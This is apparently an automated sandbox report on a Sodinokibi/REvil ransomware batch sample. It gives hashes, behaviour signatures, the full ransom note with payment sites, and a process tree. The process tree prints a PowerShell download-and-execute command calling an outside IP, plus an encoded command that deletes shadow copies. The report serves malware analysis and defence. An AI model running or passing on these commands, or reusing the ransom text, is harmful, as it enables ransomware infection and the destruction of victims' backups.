Overview

overview

10

Static

static

76268c9536...45.bat

windows7_x64

10

76268c9536...45.bat

windows10_x64

10

Analysis

  • max time kernel
    115s
  • max time network
    113s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    20-05-2020 14:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    76268c9536af4328d6c0da30152c5045.bat

  • Size

    215B

  • MD5

    572a573b2da48bc8e094db663f4d54cd

  • SHA1

    3f06e7dc06fac49d4c675ad67cd2ba2113fb6d1e

  • SHA256

    8f7ad3b1ae4a99516d4e47fa682097895f767f07cbaf4ac432636610ca16a237

  • SHA512

    d90c574c7012e4e58968023d625d18ccf5f713a2a9888e86bb10d692b5db6d9496cc0f3de1778ddfafebf64b5146ca625a58e09e2a939e7140cea9a00521b30d

Score
10/10
ransomwarepersistenceevasionspywaretrojansodinokibi

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/76268c9536af4328d6c0da30152c5045

Extracted

Path

C:\4702c1-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome.Schmersal. ===--- [+] Whats Happen? [+] Your files are encrypted, and stolen, we already have your important files. You can check it: all files on your system has extension 4702c1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5B753BD63BD6B200 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/5B753BD63BD6B200 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: zpoRZwMjse1XOMEz8B5gQbxpBxdqnJCfPE+2b6q+Vz9gc2FCI1DeFUcvHSzfWL92 ZgDgBNLGPqZo8082VDJ6xkookSQUVTcVBtHta0tWd4VxYq/Tvy+TZsOKnOSJHxde HDhArZWYdEr3k1RQjezjUBRZGLOFgqDxCSbYRPADfV3645W77sLNAzFai1VyZ7GB FZcFu0/IouBEaPvsotY6SLPD1LcxZFJBqeBj4wKWvstywT35A4RLS2GEXK4ECrxp B3keI2eOYBv7/4Ixhqpa7B9xeIJeLic84rl9QDV3mH+cywEAvNEsC+AxxudMIwzB G8Dw66Rs9TBx7Wzm48tObD8M9POXixQ5ClhnMEZeFy3tcR4xTGxJpRaN4RztwuOg VNTGr3UmyTpJsQDdQ+2QarUAj000a3ldQQmTOxY4N4ELaJZXBRLA3Q/CUAxBjaC5 Xr/KaelnHmZlbWghFmDcKulnkenHYB8YIVaPVsrKed6bAUHfVvRJimevnP3n2kqj yg0E3P3kuy8EIRHksbcwA80SV6i4mj1OcO7ZZvtVwkgUQDR7cYuaIPhYdBnIit0B 8u1uiJXeUJC+XFHdkBd+xt2mBmGUdIZpVSBHD/WT+TOVIsi0nUNAbl6td1WpaYq4 pfftoJ7h1JyzUZF5IRAr/nyVTfz4/8Q3j1AXxLeh06EgJvqvEBlfiDybFJIvHQcv iRgPU5H8UkUjH/zyRp2OqM8/q6UbwaFBXJ+92DvUBHi2UROXT52JjUquK8E27HS+ a85MER7wcdSbIhE6uNDqH+TEMBAw01cN9v7e0wGMvTMyegwaeztXJsf6QlxMmdo3 pobpZQTTrpLsHaS6RCA7yaucDZ0Fq1izbc2E0gQqEBdfeen9FXo0r/z1hSpZ9UCK dgP7gxIf/QDq1DRh+N+THadDW2Xoni9/CYXV12e9xQaVgiX6vfICJJqJupVzPCxB jMOm3FRnp1J/in8VEwr41HPuSK4QBaTxnYMwGDY8V7vH2HYR3Xc1I+CBdBqIxXv/ QOrN6zzSTYnlPK+s5q+IBoZga9wDDxoPDz6KGVUaWrpbWokD+z92FUe56++WCoad lOsn901W1MiRbaZJGpB1XT+2VsaFwgJy6rqcKyF91cnxLxzB2ULOuvceibw3ttlo A26Em55Vvk1FNRigZ7B5kQSTJl3NFJi1iQsDf4JfsD8EhqneYeNIiqCawH3NTVTu Iyi30XFw7fGtXExnd5vtK3DzNWDoLWRVUmp0ewA66+Oh3MAv1ABIO3H5PFt5n4Qh UY8IJBen1rXWZS5y6BUCs4SZmtH5Ikon1sgEB9RRbKM= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5B753BD63BD6B200

http://decryptor.cc/5B753BD63BD6B200

Signatures

  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Modifies service 2 TTPs 4 IoCs
    persistence
  • Drops file in Program Files directory 32 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
    evasionspywaretrojan
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in System32 directory 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Enumerates connected drives 3 TTPs
  • Blacklisted process makes network request 89 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\76268c9536af4328d6c0da30152c5045.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1008
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/76268c9536af4328d6c0da30152c5045');Invoke-ANLMXOIN;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Sets desktop wallpaper using registry
      • Drops file in System32 directory
      • Blacklisted process makes network request
      PID:1424
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1548
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:528

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit